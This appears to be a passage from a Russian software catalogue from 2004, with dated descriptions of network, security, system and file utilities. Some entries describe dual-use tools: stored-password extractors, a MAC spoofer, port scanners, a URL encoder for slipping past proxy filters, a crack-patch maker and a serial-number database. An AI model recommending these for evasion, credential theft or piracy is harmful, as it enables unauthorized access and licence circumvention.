Программа защищает Вашу сеть путем сверки комбинаций IP/MAC . Некоторое время программа работает в режиме сбора данных о сети и заносит все комбинации в свою базу данных, а потом Вы переключаете ее в следящий режим и все неизвестные пары IP/MAC будут считаться подозрительными, о чем IPNetMon Вас оповестит. Программа также покажет откуда, куда, когда и какой обьем информации был получен.
ОС: All Win
Тип программы: Мониторинг сети

29/03/2004 AutoMailer
Менеджер для автоматической отправки e-mail сообщений, содержащих вложенные файлы, через заданный промежуток времени. Вложенные файлы могут быть указаны по имени или с использованием шаблона, есть возможность архивации файлов перед их отправкой.
ОС: All Win
Тип программы: Почта

28/03/2004 Traffic Inspector Personal Edition
Бесплатная версия известного прокси-сервера Traffic Inspector. Traffic Inspector PE обеспечивает эффективную сетевую защиту компьютера за счет сетевого экрана, очень простого в настройке и при этом эффективного:
+ полностью закрывает компьютер снаружи по всем протоколам, прозрачно пропуская исходящий трафик;
+ экономит трафик за счет общего кеша встроенного прокси сервера;
+ обеспечивает персональный учет работы с Интернетом для пользователей компьютера;
+ каждый пользователь компьютера будет иметь отдельный счет с возможностью установки ограничений на его работу;
+ обеспечивает разграничение доступа - по ресурсам, времени работы и прочее.
В программу встроен универсальный веб-сервер с поддержкой скриптов, на котором уже расположен сервер статистики.
ОС: Win 2k/XP
Тип программы: Прокси-сервер

27/03/2004 url2bmp
Полезная утилита, которая позволяет легко и быстро сделать скриншоты с веб-страниц любой длины, кроме этого есть возможность масштабирования полученного скриншота веб-страницы, результат работы программы может быть сохранен в одном из следующих графических форматов: BMP, PNG, Jpeg или Tiff. Отличительной особенностью этой программы от программ такого типа, является возможность использования командной строки.
ОС: All Win
Тип программы: HTTP

26/03/2004 Network Communicator
Коммуникатор для локальных сетей с обширными возможностями:
+ одновременное общение с 32-мя пользователями;
+ текстовое общение с неограниченным количеством пользователей;
+ автоматическое определение компьютеров в сети;
+ программа не требует настройки и имеет очень удобный интерфейс;
+ возможность не принимать входящие вызовы;
+ наличие игнор-листа;
+ обмен файлами без использования папок общего доступа;
+ встроенный менеджер проверки и загрузки обновлений;
+ встроенная система устранения проблем совместимости.
Программа бесплатна и не требует обязательной регистрации (для получения технической поддержки и получения возможности загрузки новых версий Вы должны зарегистрироваться на сайте).
ОС: All Win
Тип программы: Чат

25/03/2004 Icon Master
Данная программа позволяет конвертировать графическое изображение в BMP формате в файл иконки или в элемент библиотеки иконок с различными параметрами. Программа обладает следующими отличительными особенностями:
+ маленький размер дистрибутива, около 30Кб;
+ выбор размера создаваемой иконки: 16x16, 32x32 и 48x48;
+ выбор цветовой палитры иконки: 4-х, 8-ми, 16-ти и 24-х битная палитра;
+ применение прозрачности к заданному цвету;
+ создание библиотек иконок;
и многое другое.
ОС: All Win
Тип программы: Прочее

24/03/2004 Список служб в Windows XP
Хорошая подборка документации в CHM формате, содержащая подробную информацию о каждой из стандартных служб в Windows XP на русском языке.
ОС: All Win
Тип программы: Документация

23/03/2004 SendTo FTP
Небольшая утилита, которая добавляет в контекстное меню Проводника возможность отправки выделеного файла(файлов) на FTP сервер с заданными параметрами.
ОС: All Win
Тип программы: FTP

22/03/2004 Analog
Программа представляет логи веб-сервера в наглядной и легко читаемой форме. Работает очень быстро (обрабатывает 6 милионов строк логфайла за 35 минут на машине с прцессором 266MHz). Доступны исходники на С.
ОС: Cross-platform
Тип программы: HTTP

21/03/2004 AccessPort
Это дебаггер для COM портов. Может отслеживать все данные проходящие через порт, а также посылать тестовые запросы. AccessPort умеет работать в режиме монитора и отражать работу с портом не только исследуемой программы но и всех остальных.
Внимание! Перед тем как использовать программу, прочтите инструкцию на сайте производителя.
ОС: Win NT/2k/XP
Тип программы: Железо

20/03/2004 Memtest86
Утилита для проведения тщательного тестирования модулей памяти на платформах с архитектурой х86.
ОС: All Win
Тип программы: Железо

19/03/2004 A-Proxy
Прокси-сервер, написанный на Jave, который обеспечивает работу прокси-сервера по различным протоколам(HTTP, FTP, Socks4/5, Telnet и др.), обладает следующими особенностями: поддержка SSL соединения, возможность запрета доступа по IP адресам, использование каскада для HTTP и SSL и многое другое.
ОС: All Win
Тип программы: Прокси-сервер

18/03/2004 %L%I%N%K%Z
Небольшая утилита целью которой является преобразование веб-адреса помещенного в буфер обмена в HEX вид, что позволяет в большинстве случаев обойти синтаксический анализ веб-адреса на используемом вами прокси-сервере.
ОС: All Win
Тип программы: HTTP

17/03/2004 TrustSight Security Hardening Tool
Программа выполняет анализ файлов конфигурации(php.ini и httpd.conf) веб-сервера Apache и/или PHP для нахождения в них параметров, которые могут представлять какой-либо риск безопасности сервера. В результате анализа программа формирует отчет, который может быть сохранен в HTML виде.
ОС: All Win
Тип программы: Аудит безопасности

16/03/2004 DAMN Hash Calculator
Маленькая и простая утилита для подсчета хешей. Поддерживаются следующие криптоалгоритмы: MD5, SHA-160 (SHA-1), SHA-256, SHA-384, SHA-512, RIPEMD-160, HAVAL и CRC-32. Хеш можно считать от строки или от файла размером до 4,294,967,295 байт.
ОС: All Win
Тип программы: Криптография

15/03/2004 System Properties
Программа показывает разнообразную информацию о системных настройках, при этом позволяя изменять практически все параметры, доступные для изменений. Из особенностей программы можно выделить очень удобную навигацию и наглядность представления данных, кроме этого в программу входит ряд полезных утилит для настройки системы: извлечение иконок из файлов, поиск неправильных ярлыков, просмотр запущенных процессов и их окон, просмотр журнала событий, редактор реестра и многое, многое другое.
ОС: Win NT/2k/XP
Тип программы: Системные утилиты

14/03/2004 Handy Recovery
Программа для восстановления удаленных файлов, поддерживает восстановление файлов и структуры каталогов с дискет и жестких дисков с файловыми системами FAT12/16/32, NTFS/NTFS 5, имеет простой, интуитивно понятный интерфейс пользователя.
ОС: All Win
Тип программы: Восстановление информации

13/03/2004 SOCKS Proxy Checker
Осуществляет проверку списка SOCKS 4 / SOCKS 5 / HTTPS proxy серверов. Позволяет брать списки proxy из файлов разных форматов (HTML & TXT). Может проверять списки прокси любых размеро. Дистрибутив содержит ссылки на списки свежих SOCKS proxy серверов и подробное описание принципов работы с программой на русском языке.
ОС: All Win
Тип программы: Прокси-сервер

12/03/2004 HFS - HTTP File Server
HTTP сервер, предназначенный для легкого и быстрого расшаривания своих ресурсов. Есть возможность выбора папки (или папок), доступной из Интернета. Можно установить доступ как для всех, так и только для избранных - в этом случае доступ к файлам будет открыт только после ввода пароля. Кроме этого, можно установливать ограничения на тип доступных для скачивания файлов (zip, rar и т.п.). Для дополнительной безопасности допускается размещать общедоступные папки на виртуальной файловой системе. Из дополнительных удобств следует отметить допустимость написания к каждой из расшаренной папке комментария, который будет видеть пользователь, решивший в нее заглянуть. Работает без инсталляции, поддерживает докачку файлов, есть неплохая статистика (в том числе работающая в реальном времени), при использовании нескольких сетевых карт из них можно выбрать ту, на которой будет работать программа. На сайте разработчика доступны для скачивания исходники этой программы.
ОС: All Win
Тип программы: HTTP

11/03/2004 DESmanager
С помощью этой dll можно легко, просто и бесплатно добавить в свое приложение поддержку шифрования алгоритмом DES.
ОС: Cross-platform
Тип программы: Программирование

10/03/2004 CleanCache
Программа, представляющая собой чистильщик системы, позволяет очистить следующие области:
+ Temporary Internet Files и index.dat;
+ Историю Internet Explorer и index.dat;
+ Internet Explorer Cookies (с выборочным сохранением) и index.dat;
+ Поля URLов (с выборочным сохранением);
+ Поля автозаполнения Internet Explorer;
+ История открытых документов;
+ История поисковых запросов;
+ Windows Temporary Directory;
+ Registry MRUs;
+ Корзина;
и другое.
Для работы программы необходимы библиотеки: Microsoft .NET Framework.
ОС: Win XP
Тип программы: Системные утилиты

9/03/2004 Perl Code Obfuscator
Утилита предназначена для того чтобы сделать perl скрипты менее "читабельными" и затруднить их анализ. Из кода вырезаються все комментарии, все переменные переименовываются, все что можно шифруется.
ОС: All Win
Тип программы: Программирование

8/03/2004 PrintFolders
Программа, предназначенная для создания списка файлов заданного каталога в формате plain-text (TXT) или HTML. Программа имеет следующие возможности:
+ сортировка файлов(по имени, расширению, размеру и дате создания);
+ обработка вложенных папок;
+ обработка ID3 тегов для MP3 файлов;
+ выборка файлов по заданному шаблону имени;
+ настройка цветовой палитры для вывода в HTML формате;
и многое другое.
ОС: All Win
Тип программы: Файловые утилиты

7/03/2004 Far Manager FTP Password recovery
Маленькая утилита, предназначенная для восстановления забытых паролей и аккаунтов в FTP-клиенте файлового менеджера FAR.
ОС: All Win
Тип программы: Взломщики паролей

6/03/2004 Spam-Aid
Программа, препятствующая проникновению спама на Ваш компьютер. Spam-Aid не будет принимать письма с неизвестных email адресов, или не содержащие ключевого слова в заголовке. На такие письма программа автоматически отправит запрос ключевого слова. Spam-Aid работает через POP3 и использует базу адресов Outlook Express.
ОС: All Win
Тип программы: Почта

5/03/2004 ToolbarCop
Утилита для опытных пользователей, которая позволяет целиком удалять установленные в Internet Explorer дополнительные панели, иконки панелей, дополнительные пункты контекстного меню и BHOs.
ОС: All Win
Тип программы: Системные утилиты

4/03/2004 File Sieve
Небольшая(27Кб) полезная утилита, которая позволяет распределить файлы из заданого каталога по папкам в соответствии с первыми буквами имен файлов. Ограничением является отсутствие поддержки русских букв.
ОС: All Win
Тип программы: Файловые утилиты

3/03/2004 RockXP
Программка предназначена для восстановления забытого кода активации для Windows XP. К тому же она поможет узнать логины и пароли, которые ОС хранит в Windows Secure Storage.
ОС: Win NT/2k/XP
Тип программы: Взломщики паролей

2/03/2004 SMAC
Утилита позволяет подменить MAC адрес в системах, не трогая "железо", изменяя MAC адрес в свойствах ОС.
ОС: Win NT/2k/XP
Тип программы: MAC

29/02/2004 pcAudit
Маленькая утилита протестирует зашиту компьютера и попробует отослать тестовый запрос на сайт производителя. Если эта операция прошла незамеченной то защита никудышная :)
ОС: All Win
Тип программы: Аудит безопасности

28/02/2004 File Integrity Verification & Encryption
Программа обеспечивающая шифрование/дешифрования выбранных файлов, используя алгоритм криптования Rijndael и SHA1, кроме этого программа отслеживает изменения в заданных файлах.
ОС: All Win
Тип программы: Криптография

27/02/2004 Visual Ping monitor
Утилита для мониторинга отклика. Замеряет время отклика сервера и строит график-отчет. При достижении пороговых значений умеет запускать какую-либо программу и тем самым информировать пользователя.
ОС: All Win
Тип программы: Сетевые утилиты

26/02/2004 MobileAdmin
С помощью этой программы можно администрировать компьютер под управлением Windows через мобильник отправляя SMS или SMS2ICQ с соответствующими коммандами. Мобильник должен работать в системе GSM.
ОС: All Win
Тип программы: Удаленное администрирование

25/02/2004 UsaMimi Hurricane
Редактор запущенных процессов на Вашем компьютере. Позволяет копировать участки процессов на диск, копировать и вставлять блоки, ставить закладки на интересуюшие участки и многое другое.
ОС: All Win
Тип программы: Реверсинг

24/02/2004 Hexplorer
HEX редактор с большим количеством различных функций: возможность изменять цветовые схемы представления данных, неограниченная отмена предыдущего действия, функция поиска и замены, функции анализа структуры файла, Pixel Viewer - отображение содержимого файла в виде картинки с заданными параметрами цвета и размера, вычисление контрольной суммы и значения CRC16/32, возможность экспортировать данные в Си или Ассемблер, определение типа редактируемого файла и многое, многое другое.
ОС: All Win
Тип программы: Реверсинг

23/02/2004 FileAlyzer
Утилита показывает детальную информацию по файлам в форматах INI, HTML, PE, MP3, CSV, dBase и многих других, есть возможность встраивания программы в контекстное меню.
ОС: All Win
Тип программы: Файловые утилиты

22/02/2004 WinSSL Wrap
С помошью этой программы возможно создавать криптографически защищенные каналы в программах, изначально для этого не предназначеных. WinSSL Wrap работает как прокси и шифрует данные "на лету".
ОС: All Win
Тип программы: Туннелирование

21/02/2004 Look@LAN Network Monitor
Программа для сбора информации о всех компьютерах локальной сети, в результате сбора информации программа строит различные графики и выдает отчет в HTML формате.
ОС: All Win
Тип программы: Сетевые сканеры

20/02/2004 ImageXYZ
Программа для защиты изображений от копирования. Всего за несколько кликов мышкой на изображение будет нанесен текст, отдаленно напоминающий водяные знаки на банкнотах. Получается и быстро и красиво и для того чтобы надпись убрать придется порядком повозиться. Для работы программа требует .NET Framework.
ОС: All Win
Тип программы: Стеганография

19/02/2004 Microsoft Mydoom Removal Tool
Программа для удаления опасных интернет-червей: Mydoom.A, Mydoom.B, Doomjuice.A и Doomjuice.B из системы.
ОС: All Win
Тип программы: Антивирусная защита

18/02/2004 SecurePAQ INIDS
Эта программа постарается сохранить девственность Вашего компьютера. Обнаружит попытки сканирования, выявит необычное изменение трафика и выполнение подозрительных команд. И сразу же оповестит звуковым сигналом.
ОС: Win NT/2k/XP
Тип программы: Мониторинг сети

17/02/2004 Blue's Port Scanner
Порт-сканер, предназначенный для сканирования заданного диапозона IP адресов на открыте порты. Сканер содержит большую базу портов, имеет защиту от флуда, показывает очень хорошие скоростные характеристики: около 5000 портов за 8 секунд. Несмотря на поддержку всех ОС семейства Windows, лучшие результаты демонстрирует на системах с технологией NT. Существует два варианта программы: с графическим пользовательским интерфейсом и консольное исполнение.
ОС: All Win
Тип программы: Сканеры портов

16/02/2004 CompuSec PC Security Suite
Профессиональная система безопасности, которая позволяет установить пароль на загрузку системы, поддерживает полное шифрование жесткого диска, дискет, флэш-карт и других сменных носителей информации. Установка такого типа защиты позволит надежно защитить ваши данные от посторонних, т.к. парольная защита сохраняется, даже при переносе жесткого диска(или другого носителя) на другой компьютер. При шифровании используется надежная система AES(Advanced Encryption Standard), что позволяет производить шифрование "на лету" с большой скоростью.
ОС: Win NT/2k/XP
Тип программы: Криптография

15/02/2004 ClipSecure
Маленькая, но очень мощная утилита для криптографической защиты данных. Основная задача программы - шифровка содержимого буфера обмена, заданного текста или просто сообщения электронной почты, кроме этого возможна шифровка/дешифровка файлов размером до 10Мб. Поддерживает большое количество различных алгоритмов шифрования: MD5, RipeMD, SHA1, SHA256, SHA512, Tiger, CBC, CFB8bit, CFBblock, OFB, CTR, Blowfish, Cast256, MARS, RC6, AES (Rijndael), Serpent, Twofish, IDEA, 3DES.
ОС: All Win
Тип программы: Криптография

14/02/2004 HijackThis
Программа ля удаления из системы различного рода внедрений, которые могут быть установлены в вашу систему через веб-сайт или какую-либо программу. Программа имеет постоянно обновляемую базу.
ОС: All Win
Тип программы: Аудит безопасности

13/02/2004 KL-Detector
Небольшая утилита, которая поможет обнаружить присутствие кейлоггера на вашем компьютере. Для обнаружения, необходимо всего лишь запустить эту программу и набрать несколько слов на клавиатуре, после чего KL-Detector обнаружит лог-файл в который пишутся данные. При тестировании были найдены все 3 лог-файла от соответственно трех шпионских утилит. Недостатком программы является то, что местонахождение самих кейлоггеров так и остается неизвестным.
ОС: Win 2k/XP
Тип программы: Мониторинг системы

12/02/2004 OllyDbg
Дебагер, предназначенный для отладки собственных проектов на ассемблере. Кроме встроенного ассемблера, дизассемблера и распознавания имен стандартных функций WinAPI содержит много других уникальных возможностей, например, позволяет присваивать имена функциям прямо во время отладки, распознает функции/процедуры и операторы CASE, а также содержит множество других полезных cредств и функций, которые могут быть расширены благодаря поддержки плагинов.
ОС: All Win
Тип программы: Реверсинг

11/02/2004 KFWhois
WHOIS и HOST утилиты, интегрированные в IE. Вы сможете быстро узнать регистрационную информацию о домене или IP адрес нужного сервера. Полученные результаты сохраняются в базе, существует возможность просмотра списка доменов, автоматический поиск нужного whois сервера, но иногда ошибается при чтении некоторый полей для национальных доменов, например, не читает expires для .ru доменов.
ОС: All Win
Тип программы: Сетевые утилиты

10/02/2004 LiePass
Программа предназначена для "экстренных" (форс-мажорных) случаев. При загрузке ПК требует ввести пароль. Если оный введён верно - система успешно загружается, если же пароль соответствует выбранному ложному паролю (специально для таких случаев), то предварительно заданная папка с "секретной" информацией немедленно уничтожается!
ОС: All Win
Тип программы: Уничтожение данных

9/02/2004 Starter
Программа для отслеживания приложений, запускаемых при запуске ОС Windows. Конечно, есть и стандартная msconfig, но эта утилита намного функциональнее и отображает более подробную информацию о найденных приложениях: имя файла, путь, размер, версия и прочее. Кроме этого можно поискать данный файл в Интернете. Дополнительной возможностью программы является менеджер процессов, который показывает все запущенные процессы в системе и позволяет выставить приоритет или завершить выбранный процесс.
ОС: All Win
Тип программы: Системные утилиты

8/02/2004 Text Hide
Утилита для стеганографической обработки текстовых файлов. Позволяет спрятать в текстовом файле любой бинарный файл. Имеется возможность 32-битной шифровки скрываемой информации с паролем.
ОС: All Win
Тип программы: Стеганография

7/02/2004 System File Defragmenter
Служебная утилита для дефрагментации следующих файлов: файла подкачки (pagefile.sys и hiberfil.sys), файл, куда сбрасываются данные из RAM при переводе компьютера в спящий режим, файлы системных логов и файла реестра подкачки. Помимо этого, утилита дефрагментирует большое колличество файлов в XP, используемые системой, и обычно недоступных для обычного дефрагментатора. Показывает количество фрагментов в том или ином файле. System File Defragmenter дает реальное ускорение быстродействия системы и является прекрасным дополнением к классическим дефрагментаторам.
ОС: Win NT/2k/XP
Тип программы: Системные утилиты

6/02/2004 ReactOS
ReactOS - это операционная система с открытам кодом, целью которой является совместимость с приложениями и драйверами Microsoft(R) Windows(R). ОС включает в себя: файловый менеджер, текстовый редактор, редактор реестра, тетрис, WineMine, калькулятор, загрузчик и многое другое. Есть возможность работы в графическом пользовательском интерфейсе и с помощью консоли.
ОС: ОС
Тип программы: ОС

5/02/2004 Patchfinder2
Программа предназначена для поиска и обнаружения руткитов (закладок) в операционной системы Windows 2000. Использует софистический метод поиска заражённых библиотек и ядра. В частсности, способна обнаружить такие руткиты, как: Hacker Defender, APX, Vaniquish, He4Hook etc.
ОС: Win 2k
Тип программы: Аудит безопасности

4/02/2004 Restoration
Небольшая утилита для восстановления удаленных файлов. Программа не имеет инсталяции, дабы не засорять систему и умещается на дискете. Умеет работать с FAT и NTFS, а также с картами памяти цифровых камер.
ОС: All Win
Тип программы: Восстановление информации

3/02/2004 Clam AntiVirus
GPL антивирус под Unix, представляет собой отличную альтернативу платным антивирусам. Пакет проверяет на вирусы пересылаемые по электронной почте файлы, имеет возможность проверки в файловых архивах. Состоит из многопоточного демона, утилиты-сканера для проверки из командной строки. В базе около 20000 вирусов, червей и троянских программ. Имеются средства для автоматического обновления базы через Интернет. Поддерживает архивы RAR (2.0), Zip, Gzip, Bzip2, может проверять вирусы прямо в mailbox или maildir.
ОС: Unix
Тип программы: Антивирусная защита

2/02/2004 Webcpp
Программа позволяет конвертировать исходные коды программ на разных языках программирования (Assembler, ASP, Basic, C, C++, DOS Batch, Java, Javascript, Pascal, Perl, PHP, SQL и многие др.) в HTML файл с подсветкой синтаксиса и обработкой рядом других полезных функций. Cуществует как консольная версия программы, так и версия с графическим пользовательским интерфейсом.
ОС: Cross-platform
Тип программы: HTML

1/02/2004 SuperScan
Сетевой сканер портов, который обладает большой гибкостью настроек и наличием всех необходимых функций. Сканирование происходит очень быстро за счет использования нескольких потоков и применения асинхронных методов. Кроме этого существует возможность подключиться к тому или иному открытому порту, чтобы получить дополнительную информацию. Программа обладает очень простым и понятным интерфейсом.
ОС: All Win
Тип программы: Сканеры портов

31/01/2004 xCAT - Keyboard Network Leds
Практически бесполезная, но с очень хорошей идеей маленькая утилита, которая фиксирует сетевую активность, отображение этой активности происходит миганием диодов на клавиатуре, которые соответствуют клавишам caps-, num- и scroll-lock.
ОС: All Win
Тип программы: Мониторинг сети

30/01/2004 FileCompare
Программа предназначена для побайтового сравнения двух файлов одинаковой длины и создания «патчей», автоматически вносящих исправление в старую версию. Позволяет также создать crk-файл и Win32 GUI Patch.
ОС: All Win
Тип программы: Реверсинг

29/01/2004 TinyUpLoader
Утилита, представляющая из себя планировщик автоматической загрузки и синхронизации файлов вашего компьютера с заданным FTP сервером.
ОС: All Win
Тип программы: FTP

28/01/2004 X-Setup Pro
Программа настройки Windows систем при помощи изменения скрытых параметров системы, с помощью этой программы вы сможете изменить более 1600 настроек. Простой интерфейс, поддержка плагинов и высокая функциональность делает эту программу лучшей в своем роде.
ОС: All Win
Тип программы: Системные утилиты

27/01/2004 mst IsUsedBy
Небольшая утилита, позволяющая узнать какая программа использует тот или иной файл. Чтобы получить эту информацию, необходимо просто перетащить интересующий вас файл в окно программы.
ОС: Win 2k/XP
Тип программы: Файловые утилиты

26/01/2004 Справочник по реестру Windows
Документация в формате CHM, содержащая информацию о различных разделах реестра MS Windows, которые позволяют наиболее тонко настроить систему на более высокую функциональность.
ОС: All Win
Тип программы: Документация

25/01/2004 MHDD
Программный комплекс для точной диагностики и мелкого ремонта жестких дисков. Позволяет работать с накопителями на низком уровне, напрямую через порты IDE контроллера. Выполняет очень быструю и точную диагностику всей поверхности накопителя (в отличие от таких программ как NDD, ScanDisk, которые адресуют только логические разделы), независимо от данных, которые находятся на диагностируемом накопителе. Позволяет с максимально возможной скоростью избавиться от так называемых «soft»-bad секторов. В программе реализованы следующие функции:
+ Максимально быстрая и точная диагностика состояния механической части накопителя (поверхности и головки) Скрытие дефектных секторов, а также оптимальный алгоритм исправления «soft»-bad секторов (секторов с неправильным CRC)
+ Постоянный мониторинг состояния регистров IDE контроллера
+ Возможность уменьшить объём накопителя (функция HPA)
+ Возможность отрегулировать шум, издаваемый накопителем (независимо от производителя накопителя) — AAM
+ Работа со SMART. Журналы ошибок, запуск тестов, атрибуты
+ Уничтожение всей информации на накопителе без возможности восстановления
+ Работа с парольной системой накопителя. Установка, снятие пароля
+ Моментальное разбиение нового винчестера на один логический диск на весь объем винчестера
+ «Разогрев» накопителя и тестирование его в экстремальных условиях
+ Просмотр заводских дефект-листов на некоторых накопителях
+ Пакетное тестирование нескольких накопителей, а также другие возможности для профессиональной работы с HDD.
ОС: All Win
Тип программы: Дисковые утилиты

24/01/2004 PScanDetect
Утилита, основное назначение которой - обнаружение попыток сканирования сервера (или рабочей станции) и выполнения определённых действий, который доступны с ключом -h. Предназначена для компиляции в ОС: Linux, FreeBSD, OpenBSD.
ОС: Unix
Тип программы: Мониторинг сети

23/01/2004 Easy Message Express
Месенджер, умеет работать по протоколам ICQ, MSN, Yahoo и AOL. Имеет маленький размер и не требователен к ресурсам. Поддерживает одновременную работу нескольких аккуантов, не содержит баннеров и имеет практически все функции клиентов ICQ, MSN, Yahoo и AOL.
ОС: All Win
Тип программы: Чат

22/01/2004 NEWT Freeware
Сетевой сканер для получения доступной информации о удаленном компьютере в сети, программа отображает около 17 различных характеристик: имя компьютера, IP адрес, ОС, тип ОС, наличие Service Pack, тип процессора, частоту процессора, дату и время, MAC адрес, мя пользователя, домен, Ping, описание компьютера и другое. Существует возможность сохранить полученные данные в HTML, CSV формате или просто в виде текста.
ОС: Win NT/2k/XP
Тип программы: Сетевые сканеры

21/01/2004 SurfXpert Startpage
SurfXpert Startpage превращает обычную стартовую страницу в личный портал для профессиональной работы в Сети. Теперь самые любимые ссылки, поисковики, новости, погода - все самое нужное всегда под рукой, на одной странице, одним кликом. Причем страница лежит не где-то далеко на сервере, а у вас на компьютере. Больше не требуется никаких регистраций, запросов конфиденциальной информации и электронного адреса. Никаких баннеров или спама! SurfXpert позволяет легко настроить дизайн и содержимое стартовой страницы. В текущей версии на выбор - 100 каналов (новости в форматах HTML, XML, RSS, Javascript-модули, собственные плагины):
+ Вы можете поместить на страницу самые любимые ссылки
+ Всегда под рукой список самых посещаемых адресов
+ Есть функция восстановления адресов, разбитых на несколько строк, из буфера обмена
+ Можно импортировать новостные каналы в формате RSS
+ Независимость от качества связи - страница хранится локально
+ Дизайн меняется с помощью скинов
В отличие от традиционных порталов, SurfXpert не ограничен новостями и Интернет-содержанием. Страница состоит из независимых веб-модулей, каждый из которых может быть полноценной программой с HTML-интерфейсом. Любой разработчик может создавать новые модули, используя бесплатный набор Startpage Developer Kit.
ОС: All Win
Тип программы: HTTP

20/01/2004 IEFlashHunter
Панель позволяет быстро удалять flash элементы со страницы в Internet Explorer. Все упрощено до придела - захватываете мышкой перекрестье прицела, тащите и отпускаете над flash элементом. После этого он убирается со страницы.
ОС: All Win
Тип программы: HTTP

19/01/2004 bmpPacker
Программа предназначенная для скрытия зашифрованных файлов различных типов в BMP файлы. После того, как вы выбрали необходимый файл, программа может зашифровать его одним из 3х доступных алгоритмов(Blowfish, Twofish и Rijndael) и создать из зашифрованного файла BMP изображение в виде "шума". Чтобы расшифровать этот файл вам необходимо открыть, созданный программой BMP файл, в программе и ввести пароль.
ОС: All Win
Тип программы: Стеганография

18/01/2004 Cerberus FTP Server
FTP сервер, не требовательный к ресурсам системы, способен отслеживать подключения на нескольких интерфейсах, восстанавливать прерванные сеансы, поддерживает PASV, ведет лог со статистикой о времени, тайм-ауте, IP-адресе и приоритетах. Разработчики утверждают о полном соответствии RFC959 и RFC1123.
ОС: All Win
Тип программы: FTP

17/01/2004 UPX X-Shell
Оболочка для популярного упаковщика исполняемых файлов UPX под MS Windows системы. Очень облегчает работу с консольным UPX. Основные возможности:
+ реализованы все функции UPX
+ можно обрабатывать много файлов за раз
+ можно перетаскивать мышкой файлы в окно X-Shell из проводника и передавать их в параметрах
+ многоязычный, удобный в обращении интерфейс, в том числе Русский
+ возможность самостоятельно перевести интерфейс X-Shell на нужный язык
+ возможность контролировать сообщения от UPX (ошибки, предупреждения, тест файлов, ...)
+ возможность редактировать команду перед выполнением
+ поддержка визуальных стилей Windows XP
+ автоматический контроль степени сжатия файлов
+ возможность интеграции X-Shell в контекстные меню Проводника для файлов заданных типов
+ годится для работы UPX 1.24
ОС: Win 2k/XP
Тип программы: Реверсинг

16/01/2004 Bluefish
Профессиональный HTML редактор. Основные особенности программы:
+ простой интерфейс;
+ возможность открытия одновременно более 500 документов;
+ подсветка синтаксиса наиболее используемых языков программирования и разметки(HTML, PHP, C, Java, JavaScript, Java server pages (JSP), SQL, XML, Python, Perl, Cascading, stylesheets (CSS), ColdFusion, Pascal, R);
+ поддержка всех кодировок;
+ многоязыковый интерфейс, в том числе и Русский;
+ и многое, многое другое необходимого для создания веб-проектов на профессиональном уровне с использованием почти всех возможностей веб-программирования.
ОС: Unix
Тип программы: HTML

15/01/2004 DeepBurner
Программа для записи различных типов CD или DVD. Програма имеет очень простой интерфейс, что облегчает ее использование, основные функции программы:
+ создание аудио, загрузочных и CD данных;
+ поддержка записи на DVD;
+ поддержка технологий Burn-Proof и Overburning;
+ динамически регулируемый размер буфера обмена;
+ создание мультисессионных CD;
+ поддержка записи через все виды подключений: IDE (Atapi), SCSI, USB и FireWare CDR/W DVD/RAM;
+ и многое другое.
ОС: All Win
Тип программы: Дисковые утилиты

14/01/2004 Serials 2000
Программа для хранения регистрационных данных о программах, отличительной особенностью является наличие собственной базы серийных номеров, которая обновляется 2 раза в месяц.
ОС: All Win
Тип программы: Менеджеры паролей

13/01/2004 Abyss Web Server X1
Программа представляет собой небольшой веб-сервер с поддержкой HTTP/1.1, CGI, PHP, Perl и ASP, Server Side Includes (SSI). Сервер производит логирование, обработку неверных адресов, позволяет установить необходимые MIME типы. Данный веб-сервер можно использовать для локального тестирования сайтов и скриптов, а также для ведения небольших проектов.
ОС: Cross-platform
Тип программы: HTTP

12/01/2004 Work With Registry
Утилита для проверки и очистки реестра. Основные возможности:
+ высокая скорость работы;
+ сканирование выбранных ветвей реестра;
+ уникальные поиск ошибок в ключах, параметрах, заначении параметров;
+ удаление найденных ошибок;
+ ручное исправление ошибки;
+ создание файлов отката;
+ использование листа исключений;
+ автоматический режим работы;
+ и многое другое...
ОС: All Win
Тип программы: Системные утилиты

11/01/2004 Super Copy
Данная программа предназначена для копирования файлов с повреждённых носителей информации (FD, CD, DVD и т.д.). Программа заменяет несчитанные байты копируемого файла на нули. Например, программа может пригодиться для копирования фильмов с повреждённых компакт-дисков. При просмотре фильма практически не будет заметно повреждений в изображении.
ОС: All Win
Тип программы: Восстановление информации

10/01/2004 HAL
Небольшая утилита для администратор баз данных на MS Access, представляет собой планировщик заданий, который в заданное время(по расписанию) производит запуск макросов, сжатие или восстановление БД. Есть возможность работы и с БД, которые защищены паролем. Программа поддерживает работу с MS Access 2-2003.
ОС: All Win
Тип программы: Базы данных

9/01/2004 Power Off
Программа для управления питанием компьютера по расписанию или вручную. Умеет отключать компьютер, а также перезагружать, переводить в спящий или ждущий режимы по таймеру (в т.ч. и по расписанию - по дням недели), предупреждать о приближении времени выключения и принудительно закрывать приложения - например, сначала разрывает связь с Интернетом, и только потом выключает компьютер. Поддерживается управление с помощью горячих клавиш. Возможность привязки событий программы к WinAmp'у или загрузке процессора.
ОС: All Win
Тип программы: Системные утилиты

8/01/2004 HyperPool
Менеджер сетевых сервисов, предназначенный для организации работы сетевых потоков через TCP/IP соединения. В состав программы входит комплект готовых для использования сервисов, позволяющих настроить работу системы в режиме HTTP прокси-сервера. Использование программы в режиме прокси-сервера позволяет не только автоматически производить докачку файлов, загружаемых браузером, но и создавать копии сайтов с сохранением структуры каталогов. Для работы программы требуется Java Runtime Environment 1.4
ОС: All Win
Тип программы: Прокси-сервер

7/01/2004 HttpSpy
Программа для мониторинга и перехвата HTTP трафика в реальном времени. Программа поддерживает работу с различными видами данных HTTPS, HTTP 1.1, Keep-Alives и Chunking. Кроме этого HttpSpy включает в себя утилиту Modem Simulator, которая позволяет оценить загрузку веб-страниц на заданной скорости, что может быть очень полезным веб-дизайнерам. Для работы программы необходимо наличие установленных библиотек Microsoft .NET framework.
ОС: All Win
Тип программы: Мониторинг сети

6/01/2004 ArtMasker
Программа позволяет спрятать информацию в рисунки (BMP 8bit, 16bit, 32bit) и музыкальные файлы(WAV 8bit 16bit). Файл с вашей информацией предварительно шифруется. Уникальная возможность этой программы - установка параметров скрытия. Файл-контейнер не меняет своего размера. Имеется поддержка мультиязычности. На данный момент доступно три языка - английский, русский и украинский.
ОС: All Win
Тип программы: Стеганография

5/01/2004 WinDowse
Программа, которая позволяет получить подробную информацию (более 40 различных параметров) о выбранном процессе, окне программы или любом другом программном компоненте. Отличительной особенностью программы является высокая функциональность и простота в использовании.
ОС: All Win
Тип программы: Системные утилиты

4/01/2004 TypeAndRun
